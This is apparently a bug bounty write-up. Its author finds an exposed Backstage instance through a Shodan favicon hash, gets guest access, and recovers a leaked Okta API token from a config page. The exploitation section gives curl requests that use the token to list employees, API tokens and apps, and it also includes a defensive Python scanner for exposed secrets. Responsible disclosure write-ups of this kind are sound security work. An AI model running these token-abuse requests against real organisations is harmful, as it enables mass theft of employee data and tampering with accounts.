The Art of Pwning Okta For Profit and Fun
In July, while hunting in a HackerOne program, I found a vulnerability that allowed me to see the PII of all of the more than 10K employees who had an Okta account.
Discovery of Backstage
I cannot disclose the program name, so let's call it example.com. Only www.example.com, notexample.com and a few subdomains of notexample.com were in scope. When approaching a new program, I always look at how big their asset base is by searching Shodan.
While looking at the results, I noticed a strange favicon.ico logo and opened it. The application was using Backstage (https://backstage.io/). You may test for this issue across your own targets. Below is the favicon hash for the application.
http.favicon.hash:1117983176
The application had two ways to sign in: as a guest or via Okta. Without a second thought I clicked on "Enter as guest" and logged in.
Verifying the Host
However, I could not confirm whether the host actually belonged to the company and whether I should proceed further. I found a GitHub username on the CI/CD page under /catalog, which required Microsoft authentication.
I searched for the username on GitHub, went to his LinkedIn profile via GitHub and found that he had been working as a DevOps Engineer at example.com for x years.
After confirming that the host belonged to example.com, I navigated across it to see whether any page exposed sensitive information to guest access.
On the /create page, I found that I could deploy a Node.js Lambda function using GitHub Actions, which I also included in the vulnerability report. I then began enumerating the application's endpoints further.
Exposing the Okta Token
After a while, on navigating to the https://host/dev/config page, I could see the Okta access token. The page disclosed the SSO provider configuration.
With 1% hope that the token might still be valid, I searched the Okta documentation to craft a few HTTP requests to try to leak sensitive information.
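A defender-side check for the configuration disclosure described above, added here as an example and not code from the original post or from Backstage: it walks a configuration tree as served to the browser and flags keys whose names suggest secrets, plus any string value shaped like an Okta SSWS API token (the 42-character, "00"-prefixed shape is an assumption used only as a heuristic). The sample config and the token value in it are constructed and fake.

```python
import re

# Heuristic: key names that should never appear in client-visible config.
SENSITIVE_KEY = re.compile(r"(secret|token|password|api[-_]?key)", re.IGNORECASE)
# Assumption used as a heuristic: Okta API tokens are 42 characters starting with "00".
OKTA_TOKEN = re.compile(r"^00[A-Za-z0-9_-]{40}$")


def redact(value):
    """Keep just enough of a value to recognise it in a finding, never the whole secret."""
    return value[:4] + "..." + value[-2:] if len(value) > 8 else "***"


def find_exposed_secrets(config, path=""):
    """Recursively walk a dict/list config tree.

    Returns a list of (dotted path, reason, redacted value) tuples for every
    string that either looks like an Okta SSWS token or sits under a
    secret-looking key name.
    """
    findings = []
    if isinstance(config, dict):
        for key, value in config.items():
            child = f"{path}.{key}" if path else key
            if isinstance(value, str):
                if OKTA_TOKEN.match(value):
                    findings.append((child, "value looks like an Okta SSWS token", redact(value)))
                elif SENSITIVE_KEY.search(key):
                    findings.append((child, "sensitive key name in client-visible config", redact(value)))
            else:
                findings.extend(find_exposed_secrets(value, child))
    elif isinstance(config, list):
        for index, item in enumerate(config):
            findings.extend(find_exposed_secrets(item, f"{path}[{index}]"))
    return findings


# Constructed sample resembling a leaked SSO provider block; every value is fake.
SAMPLE_CONFIG = {
    "app": {"title": "Backstage", "baseUrl": "https://host"},
    "auth": {
        "providers": {
            "okta": {
                "development": {
                    "clientId": "0oaexampleclientid",
                    "clientSecret": "not-a-real-client-secret",
                    "audience": "https://example.oktapreview.com",
                    "apiToken": "00" + "A" * 40,
                }
            }
        }
    },
}

if __name__ == "__main__":
    for dotted_path, reason, shown in find_exposed_secrets(SAMPLE_CONFIG):
        print(f"{dotted_path}: {reason} ({shown})")
```

Run it against the JSON your frontend actually receives (for Backstage, the config injected into the served app) rather than the on-disk file, since that is what a guest user sees.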
Exploitation
I then used the following requests to retrieve Okta user information. I was able to retrieve the PII of more than 10K employees, including first name, last name, email address, API tokens for all users, groups, etc. I was also able to deactivate/reactivate employees' Okta accounts, delete users, and add new security devices for users.
To get Users:
curl -v -X GET -H "Accept: application/json" \
  -H "Content-Type: application/json" \
  -H "Authorization: SSWS <TOKEN_HERE>" \
  "https://example.oktapreview.com/api/v1/users?limit=25"
To Get API Tokens:
curl -v -X GET -H "Accept: application/json" \
  -H "Content-Type: application/json" \
  -H "Authorization: SSWS <TOKEN_HERE>" \
  "https://example.oktapreview.com/api/v1/api-tokens"
To get Applications:
curl -v -X GET -H "Accept: application/json" \
  -H "Content-Type: application/json" \
  -H "Authorization: SSWS <TOKEN_HERE>" \
  "https://example.oktapreview.com/api/v1/apps"
You may refer to the official Okta API documentation to exploit further: https://developer.okta.com/docs/reference/ .
Reporting and Resolution
I swiftly reported the vulnerability to the program. The program accepted the report with a CVSS score of 8.7 and paid a generous bounty.
Thank you for taking the time to go through this article. Keep learning and happy hacking.
Connect on X: https://x.com/WHOISshuvam